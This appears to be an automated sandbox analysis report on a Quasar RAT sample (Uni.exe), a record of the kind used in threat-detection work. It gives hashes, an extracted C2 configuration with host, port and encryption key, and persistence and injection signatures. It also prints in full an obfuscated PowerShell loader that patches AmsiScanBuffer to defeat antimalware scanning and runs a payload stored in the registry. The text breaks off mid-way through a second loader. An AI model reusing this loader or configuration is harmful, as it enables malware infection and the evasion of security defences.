Analysis
-
max time kernel
1800s -
max time network
1794s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-05-2024 17:28
Behavioral task
behavioral1
Sample
Uni.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.exe
Resource
win7-20240419-en
Behavioral task
behavioral3
Sample
Uni.exe
Resource
win10v2004-20240508-en
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
7417c8c73e614f293152575f46134216
-
SHA1
cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
-
SHA256
00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
-
SHA512
897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
SSDEEP
6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-dOMA5C0pQTTpKjVsCp
-
encryption_key
UBXs44u6E81wxBGZxQHk
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-KEYLOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/1892-1-0x0000000000310000-0x000000000037C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1212 created 644 1212 powershell.EXE winlogon.exe PID 1084 created 644 1084 powershell.EXE winlogon.exe -
Executes dropped EXE 3 IoCs
Processes:
$sxr-powershell.exeinstall.exeinstall.exepid process 3552 $sxr-powershell.exe 1116 install.exe 2668 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 1 raw.githubusercontent.com 4 raw.githubusercontent.com 11 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 6 IoCs
Processes:
powershell.EXEsvchost.exesvchost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1212 set thread context of 3484 1212 powershell.EXE dllhost.exe PID 1084 set thread context of 5088 1084 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
SCHTASKS.exeschtasks.exeschtasks.exepid process 1784 SCHTASKS.exe 1832 schtasks.exe 1044 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEsvchost.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715200348" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepowershell.EXEdllhost.exepid process 1212 powershell.EXE 1212 powershell.EXE 1212 powershell.EXE 3484 dllhost.exe 3484 dllhost.exe 3484 dllhost.exe 3484 dllhost.exe 3484 dllhost.exe 3484 dllhost.exe 1084 powershell.EXE 1084 powershell.EXE 3484 dllhost.exe 3484 dllhost.exe 3484 dllhost.exe 3484 dllhost.exe 3484 dllhost.exe 3484 dllhost.exe 3484 dllhost.exe 3484 dllhost.exe 1084 powershell.EXE 3484 dllhost.exe 3484 dllhost.exe 1084 powershell.EXE 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe 5088 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
Uni.exe$sxr-powershell.exepowershell.EXEdllhost.exepowershell.EXEdllhost.exedwm.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 1892 Uni.exe Token: SeDebugPrivilege 3552 $sxr-powershell.exe Token: SeDebugPrivilege 1212 powershell.EXE Token: SeDebugPrivilege 1212 powershell.EXE Token: SeDebugPrivilege 3484 dllhost.exe Token: SeDebugPrivilege 1084 powershell.EXE Token: SeDebugPrivilege 1084 powershell.EXE Token: SeDebugPrivilege 5088 dllhost.exe Token: SeShutdownPrivilege 468 dwm.exe Token: SeCreatePagefilePrivilege 468 dwm.exe Token: SeShutdownPrivilege 3276 Explorer.EXE Token: SeCreatePagefilePrivilege 3276 Explorer.EXE Token: SeShutdownPrivilege 468 dwm.exe Token: SeCreatePagefilePrivilege 468 dwm.exe Token: SeShutdownPrivilege 3276 Explorer.EXE Token: SeCreatePagefilePrivilege 3276 Explorer.EXE Token: SeShutdownPrivilege 468 dwm.exe Token: SeCreatePagefilePrivilege 468 dwm.exe Token: SeShutdownPrivilege 3276 Explorer.EXE Token: SeCreatePagefilePrivilege 3276 Explorer.EXE Token: SeShutdownPrivilege 468 dwm.exe Token: SeCreatePagefilePrivilege 468 dwm.exe Token: SeShutdownPrivilege 3276 Explorer.EXE Token: SeCreatePagefilePrivilege 3276 Explorer.EXE Token: SeShutdownPrivilege 468 dwm.exe Token: SeCreatePagefilePrivilege 468 dwm.exe Token: SeShutdownPrivilege 3276 Explorer.EXE Token: SeCreatePagefilePrivilege 3276 Explorer.EXE Token: SeShutdownPrivilege 468 dwm.exe Token: SeCreatePagefilePrivilege 468 dwm.exe Token: SeShutdownPrivilege 3276 Explorer.EXE Token: SeCreatePagefilePrivilege 3276 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 3552 $sxr-powershell.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3276 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Uni.exe$sxr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 1892 wrote to memory of 1044 1892 Uni.exe schtasks.exe PID 1892 wrote to memory of 1044 1892 Uni.exe schtasks.exe PID 1892 wrote to memory of 1044 1892 Uni.exe schtasks.exe PID 1892 wrote to memory of 3552 1892 Uni.exe $sxr-powershell.exe PID 1892 wrote to memory of 3552 1892 Uni.exe $sxr-powershell.exe PID 1892 wrote to memory of 3552 1892 Uni.exe $sxr-powershell.exe PID 1892 wrote to memory of 1116 1892 Uni.exe install.exe PID 1892 wrote to memory of 1116 1892 Uni.exe install.exe PID 1892 wrote to memory of 1116 1892 Uni.exe install.exe PID 1892 wrote to memory of 1784 1892 Uni.exe SCHTASKS.exe PID 1892 wrote to memory of 1784 1892 Uni.exe SCHTASKS.exe PID 1892 wrote to memory of 1784 1892 Uni.exe SCHTASKS.exe PID 3552 wrote to memory of 1832 3552 $sxr-powershell.exe schtasks.exe PID 3552 wrote to memory of 1832 3552 $sxr-powershell.exe schtasks.exe PID 3552 wrote to memory of 1832 3552 $sxr-powershell.exe schtasks.exe PID 1212 wrote to memory of 3484 1212 powershell.EXE dllhost.exe PID 1212 wrote to memory of 3484 1212 powershell.EXE dllhost.exe PID 1212 wrote to memory of 3484 1212 powershell.EXE dllhost.exe PID 1212 wrote to memory of 3484 1212 powershell.EXE dllhost.exe PID 1212 wrote to memory of 3484 1212 powershell.EXE dllhost.exe PID 1212 wrote to memory of 3484 1212 powershell.EXE dllhost.exe PID 1212 wrote to memory of 3484 1212 powershell.EXE dllhost.exe PID 1212 wrote to memory of 3484 1212 powershell.EXE dllhost.exe PID 3484 wrote to memory of 644 3484 dllhost.exe winlogon.exe PID 3484 wrote to memory of 696 3484 dllhost.exe lsass.exe PID 3484 wrote to memory of 1000 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 468 3484 dllhost.exe dwm.exe PID 3484 wrote to memory of 788 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 716 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1064 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1120 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1128 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1236 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1244 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1320 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1408 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1488 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1512 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1588 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1596 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1676 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1732 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1760 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1856 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1868 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1224 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 1300 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 432 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2064 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2168 3484 dllhost.exe spoolsv.exe PID 3484 wrote to memory of 2280 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2308 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2536 3484 dllhost.exe sihost.exe PID 3484 wrote to memory of 2552 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2600 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2612 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2656 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2720 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2756 3484 dllhost.exe sysmon.exe PID 3484 wrote to memory of 2784 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2792 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 2804 3484 dllhost.exe svchost.exe PID 3484 wrote to memory of 3092 3484 dllhost.exe unsecapp.exe PID 3484 wrote to memory of 3276 3484 dllhost.exe Explorer.EXE
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4d4c8da1-27c9-49f5-84d1-fb3fc4861749}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{bd90af69-7654-4952-aa71-b3b986dff5c3}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:LTLpyzitrkVG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HKoGzgSCpvqbhW,[Parameter(Position=1)][Type]$oDwhNhnzok)$AeZzfVUwoux=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+'r'+'y'+'M'+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'te'+'T'+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+','+[Char](80)+''+'u'+'bl'+[Char](105)+'c'+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+'e'+'d,'+[Char](65)+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$AeZzfVUwoux.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+'e'+'cia'+[Char](108)+'N'+'a'+'m'+'e'+''+','+'H'+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$HKoGzgSCpvqbhW).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+[Char](105)+''+'m'+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$AeZzfVUwoux.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+'d'+''+'e'+'B'+[Char](121)+'S'+'i'+''+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+'o'+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tua'+[Char](108)+'',$oDwhNhnzok,$HKoGzgSCpvqbhW).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e,'+'M'+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $AeZzfVUwoux.CreateType();}$NrvImgSRvffwk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('Mic'+[Char](114)+''+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+'o'+'d'+'s'+'');$SvBxuLaVmdNGrW=$NrvImgSRvffwk.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+'r'+'o'+''+[Char](99)+''+'A'+''+'d'+''+'d'+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+','+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mxsVWbHnyNCxRSfewoC=LTLpyzitrkVG @([String])([IntPtr]);$zzFWsXBHzsuHWyWyDnhmNg=LTLpyzitrkVG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AcnnqLPgsPl=$NrvImgSRvffwk.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+'e'+[Char](72)+''+[Char](97)+'nd'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')));$rosSuQYTDyDjYs=$SvBxuLaVmdNGrW.Invoke($Null,@([Object]$AcnnqLPgsPl,[Object]('Load'+'L'+''+[Char](105)+'br'+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$azllvhLTNHVCXeGuv=$SvBxuLaVmdNGrW.Invoke($Null,@([Object]$AcnnqLPgsPl,[Object](''+'V'+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$sazKBDK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rosSuQYTDyDjYs,$mxsVWbHnyNCxRSfewoC).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$aiaPbkUSNCXyQUtJO=$SvBxuLaVmdNGrW.Invoke($Null,@([Object]$sazKBDK,[Object]('Am'+[Char](115)+''+[Char](105)+''+'S'+'can'+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$lIBMqqQxzD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($azllvhLTNHVCXeGuv,$zzFWsXBHzsuHWyWyDnhmNg).Invoke($aiaPbkUSNCXyQUtJO,[uint32]8,4,[ref]$lIBMqqQxzD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$aiaPbkUSNCXyQUtJO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($azllvhLTNHVCXeGuv,$zzFWsXBHzsuHWyWyDnhmNg).Invoke($aiaPbkUSNCXyQUtJO,[uint32]8,0x20,[ref]$lIBMqqQxzD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$77'+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kGFIBnmTqOaK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VPMBYccJGXgqMz,[Parameter(Position=1)][Type]$wGhIKnHnmP)$qhAbXCVnFHg=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 